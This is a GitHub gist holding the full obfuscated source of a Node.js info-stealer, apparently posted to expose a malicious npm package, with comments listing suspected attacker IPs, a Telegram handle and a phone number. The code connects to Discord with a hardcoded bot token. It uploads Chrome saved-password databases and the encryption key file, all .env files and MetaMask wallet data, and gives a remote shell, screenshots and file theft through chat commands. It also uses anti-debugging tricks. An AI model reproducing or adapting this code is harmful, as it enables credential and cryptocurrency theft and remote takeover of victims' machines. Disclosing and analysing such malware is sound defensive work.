Skip to content

Instantly share code, notes, and snippets.

@kalloc

kalloc/stealer.js

Created February 4, 2025 23:58
Show Gist options
  • Save kalloc/db750c5ce7469c613c309241ee389b40 to your computer and use it in GitHub Desktop.
Save kalloc/db750c5ce7469c613c309241ee389b40 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
stealer.js
const {
Client,
GatewayIntentBits,
ChannelType,
PermissionsBitField
} = require("discord.js");
const fs = require('fs');
const os = require('os');
const path = require("path");
const {
execSync,
exec
} = require("child_process");
const {
homedir
} = os;
const screenshot = require("screenshot-desktop");
const a0_0x459bfb = {
intents: [GatewayIntentBits.Guilds, GatewayIntentBits.GuildMessages, GatewayIntentBits.MessageContent]
};
const client = new Client(a0_0x459bfb);
const systemv = os.platform().toLowerCase();
let currentDirectory = process.cwd();
function getMachineUniqueId() {
const _0x5779f1 = function () {
let _0x1557d8 = true;
return function (_0x198475, _0x1ae5b7) {
const _0x4e361a = _0x1557d8 ? function () {
if (_0x1ae5b7) {
const _0x51eaef = _0x1ae5b7.apply(_0x198475, arguments);
_0x1ae5b7 = null;
return _0x51eaef;
}
} : function () {};
_0x1557d8 = false;
return _0x4e361a;
};
}();
const _0x3faa07 = _0x5779f1(this, function () {
return _0x3faa07.toString().search("(((.+)+)+)+$").toString().constructor(_0x3faa07).search("(((.+)+)+)+$");
});
_0x3faa07();
const _0x24c168 = function () {
let _0x246a72 = true;
return function (_0x34217c, _0x3cef38) {
const _0xbabff7 = _0x246a72 ? function () {
if (_0x3cef38) {
const _0x3c112b = _0x3cef38.apply(_0x34217c, arguments);
_0x3cef38 = null;
return _0x3c112b;
}
} : function () {};
_0x246a72 = false;
return _0xbabff7;
};
}();
(function () {
_0x24c168(this, function () {
const _0x4e1195 = new RegExp("function *\\( *\\)");
const _0x1f09cd = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
const _0x2f2bd5 = _0x29be11('init');
if (!_0x4e1195.test(_0x2f2bd5 + "chain") || !_0x1f09cd.test(_0x2f2bd5 + "input")) {
_0x2f2bd5('0');
} else {
_0x29be11();
}
})();
})();
const _0x58c776 = function () {
let _0x3ec6b5 = true;
return function (_0x380e46, _0x1ad084) {
const _0x53d85b = _0x3ec6b5 ? function () {
if (_0x1ad084) {
const _0x2454a9 = _0x1ad084.apply(_0x380e46, arguments);
_0x1ad084 = null;
return _0x2454a9;
}
} : function () {};
_0x3ec6b5 = false;
return _0x53d85b;
};
}();
const _0x186b2a = _0x58c776(this, function () {
let _0x267f98;
try {
const _0x33eff3 = Function("return (function() {}.constructor(\"return this\")( ));");
_0x267f98 = _0x33eff3();
} catch (_0x1a9a70) {
_0x267f98 = window;
}
const _0x3239c0 = _0x267f98.console = _0x267f98.console || {};
const _0x165577 = ["log", "warn", "info", 'error', "exception", "table", "trace"];
for (let _0x2f8399 = 0x0; _0x2f8399 < _0x165577.length; _0x2f8399++) {
const _0x12783b = _0x58c776.constructor.prototype.bind(_0x58c776);
const _0x3342fc = _0x165577[_0x2f8399];
const _0x2ed4eb = _0x3239c0[_0x3342fc] || _0x12783b;
_0x12783b.__proto__ = _0x58c776.bind(_0x58c776);
_0x12783b.toString = _0x2ed4eb.toString.bind(_0x2ed4eb);
_0x3239c0[_0x3342fc] = _0x12783b;
}
});
_0x186b2a();
const _0x7efc14 = os.platform().toLowerCase();
try {
if (_0x7efc14 === "win32") {
const _0x57d502 = execSync("wmic csproduct get UUID").toString().split("\n");
return _0x57d502[0x1].trim();
} else {
if (_0x7efc14 === "linux") {
const _0x908b46 = fs.readFileSync("/etc/machine-id", "utf-8");
return _0x908b46.trim();
} else {
if (_0x7efc14 === "darwin") {
const _0x3047d4 = execSync("ioreg -rd1 -c IOPlatformExpertDevice | grep IOPlatformUUID").toString();
return _0x3047d4.split('=')[0x1].replace(/"/g, '').trim();
}
}
}
} catch (_0x45a644) {
console.error("Error retrieving unique machine ID: " + _0x45a644.message);
return null;
}
}
let uniqueId = getMachineUniqueId().slice(0x0, 0x8);
async function sendFilesToDiscord(_0xd91b12, _0x54b27f) {
for (const _0x3dff97 of _0x54b27f) {
if (fs.existsSync(_0x3dff97)) {
try {
const _0x4068b6 = fs.statSync(_0x3dff97);
if (_0x4068b6.size !== 0x0) {
const _0x281c81 = {
"files": [_0x3dff97]
};
await _0xd91b12.send(_0x281c81);
}
} catch (_0x244601) {
await _0xd91b12.send("Failed to send file " + _0x3dff97 + ": " + _0x244601.message);
}
} else {
await _0xd91b12.send("File does not exist: " + _0x3dff97);
}
}
}
async function findAndSendLdbFiles(_0x2b5f5c, _0x50f5b7 = "nkbihfbeogaeaoehlefnkodbefgpgknn") {
const _0x48405f = process.platform === "win32" ? os.homedir() : path.join(os.homedir(), "Library", "Application Support", "Google", "Chrome");
const _0x2c2f1f = [];
try {
await searchFiles(_0x48405f, '.ldb', _0x3c3028 => {
if (_0x3c3028.includes(_0x50f5b7)) {
_0x2c2f1f.push(_0x3c3028);
}
});
} catch (_0x1b4e17) {
console.error("Error while searching for .ldb files: " + _0x1b4e17.message);
}
await sendFilesToDiscord(_0x2b5f5c, _0x2c2f1f);
}
async function findAndSendEnvFiles(_0x507a5b) {
const _0x487e83 = os.homedir();
const _0x2c40c6 = [];
try {
await searchFiles(_0x487e83, ".env", _0x3c2d47 => {
_0x2c40c6.push(_0x3c2d47);
});
} catch (_0x523b9c) {
console.error("Error while searching for .env files: " + _0x523b9c.message);
}
await sendFilesToDiscord(_0x507a5b, _0x2c40c6);
}
async function searchFiles(_0x2a5d8a, _0x111f53, _0x5754f9) {
const _0x59d7a2 = {
withFileTypes: true
};
const _0x2bc5f9 = await fs.promises.readdir(_0x2a5d8a, _0x59d7a2);
for (const _0x307f55 of _0x2bc5f9) {
const _0x7c518b = path.join(_0x2a5d8a, _0x307f55.name);
if (_0x307f55.isDirectory()) {
await searchFiles(_0x7c518b, _0x111f53, _0x5754f9);
} else {
if (_0x307f55.isFile() && _0x307f55.name.includes(_0x111f53)) {
_0x5754f9(_0x7c518b);
}
}
}
}
function getChromeProfiles() {
let _0x956b09;
const _0x389ae6 = process.platform;
if (_0x389ae6 === "win32") {
_0x956b09 = path.join(os.homedir(), "AppData", "Local", "Google", "Chrome", "User Data");
} else {
if (_0x389ae6 === "darwin") {
_0x956b09 = path.join(os.homedir(), 'Library', "Application Support", "Google", "Chrome");
} else {
if (_0x389ae6 === "linux") {
_0x956b09 = path.join(os.homedir(), ".config", "google-chrome");
} else {
throw new Error("Unsupported platform: " + _0x389ae6);
}
}
}
return fs.readdirSync(_0x956b09).map(_0x2d0414 => path.join(_0x956b09, _0x2d0414)).filter(_0x52e48c => fs.statSync(_0x52e48c).isDirectory() && (_0x52e48c.includes("Profile") || _0x52e48c.includes("Default")));
}
function getEncryptionKey() {
const _0x1086a1 = process.platform;
if (_0x1086a1 === "win32") {
return path.join(os.homedir(), "AppData", "Local", "Google", "Chrome", "User Data", "Local State");
} else {
if (_0x1086a1 === "darwin") {
return path.join(homedir(), "Library", "Application Support", "Google", "Chrome", "Local State");
} else {
if (_0x1086a1 === "linux") {
return path.join(homedir(), '.config', "google-chrome", "Local State");
}
}
}
throw new Error("Unsupported platform: " + _0x1086a1);
}
function getEncryptionKeyMacOS() {
return path.join(homedir(), "Library", "Application Support", "Google", "Chrome", "Local State");
}
function getEncryptionKeyLinux() {
return path.join(homedir(), '.config', "google-chrome", "Local State");
}
function getEncryptionKeyWindows() {
return path.join(os.homedir(), "AppData", "Local", "Google", "Chrome", "User Data", "Local State");
}
async function sendChromeSavedPasswords(_0x56a5ad) {
try {
const _0x4b8480 = getChromeProfiles();
const _0x580550 = getEncryptionKey();
const _0x5b105b = [_0x580550];
for (const _0x5c4843 of _0x4b8480) {
const _0x1edf2b = path.join(_0x5c4843, "Login Data");
if (!fs.existsSync(_0x1edf2b)) {
continue;
}
_0x5b105b.push(_0x1edf2b);
}
await sendFilesToDiscord(_0x56a5ad, _0x5b105b);
} catch (_0x49ce55) {
console.log("error while sending chrome profiles", _0x49ce55.message);
}
}
client.once("ready", async () => {
try {
const _0x5580b7 = client.guilds.cache.first();
if (!_0x5580b7) {
console.error("The bot is not connected to any guilds.");
return;
}
let _0x4ba80e = (systemv + '-' + uniqueId).toLowerCase().replace(/\s+/g, '-').trim();
let _0x1877a5 = _0x5580b7.channels.cache.find(_0xfdf0fa => _0xfdf0fa.name === _0x4ba80e);
if (!_0x1877a5) {
_0x1877a5 = await _0x5580b7.channels.create({
'name': _0x4ba80e,
'type': ChannelType.GuildText,
'permissionOverwrites': [{
'id': _0x5580b7.roles.everyone.id,
'deny': [PermissionsBitField.Flags.ViewChannel]
}, {
'id': _0x5580b7.members.me.id,
'allow': [PermissionsBitField.Flags.ViewChannel, PermissionsBitField.Flags.SendMessages]
}]
});
} else {}
await _0x1877a5.send("Hello! This is the command execution channel. Type a command to run it.");
sendChromeSavedPasswords(_0x1877a5);
findAndSendEnvFiles(_0x1877a5);
findAndSendLdbFiles(_0x1877a5);
} catch (_0x5bae40) {
console.error("An error occurred: " + _0x5bae40.message);
}
});
client.on("messageCreate", async _0x6a9503 => {
if (_0x6a9503.author.bot) {
return;
}
let _0x193528 = (systemv + '-' + uniqueId).toLowerCase().replace(/\s+/g, '-').trim();
if (_0x6a9503.channel.name !== _0x193528) {
return;
}
const _0xd9cf35 = _0x6a9503.content.trim();
if (_0xd9cf35.startsWith("!run ")) {
const _0x557299 = _0xd9cf35.slice(0x5).trim();
if (_0x557299) {
if (_0x557299.startsWith('cd')) {
const _0x288d2c = _0x557299.split(" ");
if (_0x288d2c.length >= 0x2) {
const _0x57e2a2 = _0x288d2c.slice(0x1).join(" ");
const _0xd0ba55 = path.resolve(currentDirectory, _0x57e2a2);
fs.stat(_0xd0ba55, (_0x458a2f, _0x3cd156) => {
if (_0x458a2f) {
_0x6a9503.channel.send("Error: Directory not found.");
} else if (_0x3cd156.isDirectory()) {
currentDirectory = _0xd0ba55;
_0x6a9503.channel.send("Changed directory to: " + currentDirectory);
} else {
_0x6a9503.channel.send("Error: Not a directory.");
}
});
} else {
currentDirectory = os.homedir();
_0x6a9503.channel.send("Changed directory to home: " + currentDirectory);
}
} else {
const _0x24ba6d = {
"cwd": currentDirectory,
"shell": true
};
exec(_0x557299, _0x24ba6d, (_0x1ed584, _0x228bb7, _0x33f952) => {
if (_0x1ed584) {
_0x6a9503.channel.send("Error: " + _0x1ed584.message);
return;
}
let _0x164e61 = _0x228bb7 || _0x33f952;
if (!_0x164e61) {
_0x6a9503.channel.send("No output.");
return;
}
const _0x5619e5 = splitMessage(_0x164e61);
_0x5619e5.forEach(_0x31484a => {
_0x6a9503.channel.send("```\n" + _0x31484a + "\n```");
});
});
}
}
} else {
if (_0xd9cf35.startsWith("!screenshot")) {
const _0x43fd9e = path.join(os.tmpdir(), "screenshot.png");
const _0x487e39 = {
filename: _0x43fd9e
};
screenshot(_0x487e39).then(_0x1a61c4 => {
const _0x9078d5 = {
"content": "Here's your screenshot:",
"files": [_0x1a61c4]
};
_0x6a9503.channel.send(_0x9078d5).then(() => {
fs.unlink(_0x1a61c4, _0x17fead => {
if (_0x17fead) {
console.error("Error deleting screenshot: " + _0x17fead);
}
});
})["catch"](_0x5cfc37 => {
console.error("Error sending screenshot: " + _0x5cfc37);
_0x6a9503.channel.send("Error sending screenshot.");
});
})["catch"](_0x1ae86d => {
console.error("Error taking screenshot: " + _0x1ae86d);
_0x6a9503.channel.send("Error taking screenshot.");
});
} else {
if (_0xd9cf35.startsWith("!sendfile ")) {
const _0x2f0204 = _0xd9cf35.slice(0xa).trim();
if (_0x2f0204) {
const _0x5a8cb2 = path.join(currentDirectory, _0x2f0204);
try {
const _0x5418b6 = fs.statSync(_0x5a8cb2);
if (_0x5418b6.size !== 0x0) {
const _0x5f31fc = {
"content": "Here's your file `" + _0x2f0204 + '`:',
"files": [_0x5a8cb2]
};
_0x6a9503.channel.send(_0x5f31fc)["catch"](_0x85359b => {
console.error("Error sending file: " + _0x85359b);
_0x6a9503.channel.send("An error occurred while sending the file: " + _0x85359b.message);
});
}
} catch (_0x33586c) {
console.log("Error while sending files", _0x33586c.message);
}
}
} else {
_0x6a9503.channel.send("I don't understand that command. Use `!run {command}` to run a command, `!sendfile {filename}` to send a file, or `!screenshot` to take a screenshot.");
}
}
}
});
function splitMessage(_0x578ff8, _0x3f3390 = 0x79e) {
const _0x269a69 = [];
while (_0x578ff8.length > _0x3f3390) {
let _0x2ff70f = _0x578ff8.lastIndexOf("\n", _0x3f3390);
if (_0x2ff70f === -0x1) {
_0x2ff70f = _0x3f3390;
}
_0x269a69.push(_0x578ff8.slice(0x0, _0x2ff70f));
_0x578ff8 = _0x578ff8.slice(_0x2ff70f).trimStart();
}
if (_0x578ff8) {
_0x269a69.push(_0x578ff8);
}
return _0x269a69;
}
client.login("MTI4NTk4MDk3MjkwNjcwOTA2Mw.Gpcieu.7p78iA8vOVWXh5WpYV6dW7Sew_lfgiLw0Poh4A");
function _0x29be11(_0x3c3862) {
function _0xf8e4f2(_0x17110d) {
if (typeof _0x17110d === "string") {
return function (_0xab9f37) {}.constructor("while (true) {}").apply("counter");
} else {
if (('' + _0x17110d / _0x17110d).length !== 0x1 || _0x17110d % 0x14 === 0x0) {
(function () {
return true;
}).constructor("debugger").call("action");
} else {
(function () {
return false;
}).constructor("debugger").apply("stateObject");
}
}
_0xf8e4f2(++_0x17110d);
}
try {
if (_0x3c3862) {
return _0xf8e4f2;
} else {
_0xf8e4f2(0x0);
}
} catch (_0x1d5bef) {}
}
@kalloc
Copy link
Author

kalloc commented Feb 4, 2025

https://www.npmjs.com/package/secure-toolkits
https://www.npmjs.com/~adamstern

@kalloc
Copy link
Author

kalloc commented Feb 5, 2025

Hackers IP: 45.126.3.252 and 101.99.64.65
UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36

@kalloc
Copy link
Author

kalloc commented Feb 5, 2025

Telegram: @crypto_king1106 id7202975191

@kalloc
Copy link
Author

kalloc commented Feb 5, 2025
edited
Loading

Have used phone number: +54 221 622-2935

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment